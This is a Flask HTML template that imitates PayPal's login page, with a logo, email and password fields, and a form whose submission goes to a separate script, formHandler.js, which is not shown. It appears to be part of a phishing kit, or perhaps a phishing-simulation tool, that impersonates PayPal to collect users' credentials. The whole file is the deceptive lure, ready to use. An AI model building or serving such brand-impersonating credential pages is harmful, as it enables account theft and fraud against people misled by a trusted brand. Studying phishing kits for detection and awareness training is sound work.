<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in to your PayPal account</title>
    <link rel="shortcut icon" href="{{ url_for('static', filename='images/paypal/paypal.ico') }}" type="image/x-icon">
    <!-- <link rel="shortcut icon" href="/static/images/paypal/paypal.ico" type="image/x-icon"> -->
    <link rel="stylesheet" href="{{ url_for('static', filename='styles/paypal.css') }}">
    <!-- <link rel="stylesheet" href="/static/styles/paypal.css"> -->
</head>

<body>
    <div class="main">
        <div class="card">
            <div class="logo">
                <img src="{{ url_for('static', filename='images/paypal/logo.svg') }}" alt="logo">
                <!-- <img src="/static/images/paypal/logo.svg" alt="logo"> -->
            </div>
            <form class="form" id="form">
                <div class="input-container">
                    <input type="text" name="username" required>
                    <label>Email or mobile number</label>
                </div>
                <div class="input-container">
                    <input type="password" name="password" required>
                    <label>Password</label>
                </div>
                <div class="forgot-password">
                    <span>Forgot password?</span>
                </div>
                <div class="login-btn">
                    <button type="submit">Log In</button>
                </div>
            </form>
            <div class="seperator">
                <div class="seperator-line"></div>
                <span>or</span>
                <div class="seperator-line"></div>
            </div>
            <div class="signup-btn">
                <button>Sign Up</button>
            </div>
            <div class="languages">
                <div>
                    <img src="{{ url_for('static', filename='images/paypal/flag.png') }}" alt="usa" width="23">
                    <!-- <img src="/static/images/paypal/flag.png" alt="usa" width="24"> -->
                    <img src="{{ url_for('static', filename='images/paypal/down.svg') }}" alt="arrow-down" width="20">
                    <!-- <img src="/static/images/paypal/down.svg" alt="arrow-down" width="20"> -->
                </div>
                <ul>
                    <li class="bold"><b>English</b></li>
                    <span></span>
                    <li><b>Français</b></li>
                    <span></span>
                    <li><b>Español</b></li>
                    <span></span>
                    <li>中文</li>
                </ul>
            </div>
        </div>
    </div>
    <footer>
        <ul>
            <li>Contact Us</li>
            <li>Privacy</li>
            <li>Legal</li>
            <li>Policy Updates</li>
            <li>Worldwide</li>
        </ul>
    </footer>
    <script src="{{ url_for('static', filename='scripts/formHandler.js') }}"></script>
</body>

</html>